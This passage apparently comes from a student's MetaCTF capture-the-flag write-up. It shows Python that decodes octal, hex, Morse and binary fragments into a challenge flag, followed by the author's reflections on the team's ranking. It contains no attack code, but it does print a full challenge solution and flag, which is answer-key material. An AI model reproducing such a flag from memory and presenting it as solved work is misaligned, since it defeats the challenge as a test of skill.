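    "...-": "v", ".--": "w", "-..-": "x", "-.--": "y", "--..": "z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "..--.-": "_", "..--..": "?", ".-.-.-": ".", "--..--": ",",
}
CHAR_TO_MORSE = {c: m for m, c in MORSE_TO_CHAR.items()}


def decode_digits(text: str, base: int, width: int) -> str:
    """Decode octal/hex/binary text to ASCII. Groups may be separated by any
    whitespace; a single unbroken run is cut into fixed-width groups (3 digits
    per byte for octal, 2 for hex, 8 for binary)."""
    groups = text.split()
    if len(groups) == 1 and len(groups[0]) > width:
        run = groups[0]
        groups = [run[i:i + width] for i in range(0, len(run), width)]
    return bytes(int(g, base) for g in groups).decode("ascii")


def decode_octal(text: str) -> str:
    return decode_digits(text, 8, 3)


def decode_hex(text: str) -> str:
    return decode_digits(text, 16, 2)


def decode_binary(text: str) -> str:
    return decode_digits(text, 2, 8)


def decode_morse(text: str) -> str:
    """Letters separated by spaces, words by '/'. Morse has no case, so output is lowercase."""
    return " ".join("".join(MORSE_TO_CHAR[sym] for sym in word.split())
                    for word in text.split("/"))


def encode_morse(text: str) -> str:
    return " ".join(CHAR_TO_MORSE[c.lower()] for c in text)


# Constructed inputs: the four logo fragments re-encoded, one in each scheme.
OCTAL_SAMPLE = " ".join(format(b, "03o") for b in b"welcome_to_the_")
HEX_SAMPLE = b"CyberGames_shall_we_".hex()            # one unbroken run, no separators
MORSE_SAMPLE = encode_morse("play_a_")
BINARY_SAMPLE = " ".join(format(b, "08b") for b in b"game?")


def assemble_flag(parts) -> str:
    return "MetaCTF{" + "".join(parts) + "}"


def decode_logo() -> str:
    """Decode the four fragments in the order they appear in the flag."""
    return assemble_flag([decode_octal(OCTAL_SAMPLE), decode_hex(HEX_SAMPLE),
                          decode_morse(MORSE_SAMPLE), decode_binary(BINARY_SAMPLE)])


if __name__ == "__main__":
    print(OCTAL_SAMPLE)
    print(HEX_SAMPLE)
    print(MORSE_SAMPLE)
    print(BINARY_SAMPLE)
    print(decode_logo())
```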
In Conclusion
With 6,750 points, our score placed us in 36th overall and 24th among the student teams. This qualified us for swag bags and t-shirts (top 30 teams in each category) — my first time receiving a prize for a CTF!
It was cool to see how far my teammates and I have come in developing our skills and solving CTF challenges. I spent most of my time with the forensics challenges and solved all but two of them, which I definitely wouldn't have been able to do a few years ago. However, I also learned that I don’t have much packet capture analysis experience, which I plan to work on.
Finally, thank you to all the MetaCTF organizers for their time and effort put into this competition. I am looking forward to MetaCTF’s 2021 Cyber Games (maybe even in person again)!